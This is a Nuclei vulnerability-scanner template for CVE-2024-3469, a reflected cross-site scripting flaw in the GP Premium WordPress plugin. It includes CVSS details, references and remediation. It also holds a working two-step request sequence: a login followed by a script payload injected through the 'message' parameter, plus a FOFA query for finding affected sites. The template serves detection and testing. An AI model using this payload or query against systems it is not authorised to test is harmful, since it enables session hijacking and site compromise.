id: CVE-2024-3469 info: name: GP Premium <= 2.4.0 - Cross-Site Scripting author: Shivam Kamboj severity: medium description: | The GP Premium plugin for WordPress up to 2.4.0 is vulnerable to reflected XSS via the 'message' parameter in inc/verify.php (lines 95-101), where a message passed with sl_activation=false is URL-decoded and used unsanitized in add_settings_error(), allowing XSS payloads to be reflected in admin notices. impact: | Successful exploitation allows attackers to hijack administrator sessions via cookie theft, create rogue administrative accounts, perform actions on behalf of authenticated users, and deface the website or inject malicious content. remediation: Update GP Premium to version 2.4.1 or later. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gp-premium/gp-premium-240-reflected-cross-site-scripting - https://nvd.nist.gov/vuln/detail/CVE-2024-3469 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-3469 epss-score: 0.10068 epss-percentile: 0.93268 cwe-id: CWE-79 metadata: verified: true max-request: 1 vendor: generatepress product: gp-premium framework: wordpress fofa-query: body="/wp-content/plugins/gp-premium/" tags: cve,cve2024,wordpress,wp-plugin,gp-premium,xss,authenticated,wp,vkev http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=generate-options&sl_activation=false&message=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains_all(body, "", "setting-error-license_failed")' condition: and # digest: 4a0a00473045022100fc0900b0fb8177797484d6c3f0399b4a657e5ace53bf83a485604e0a21dd4b3b02207de51efae72289fd5a51528eccb594e27aad7c43f165eba0e431796daf5b882d:922c64590222798bb761d5b6d8e72950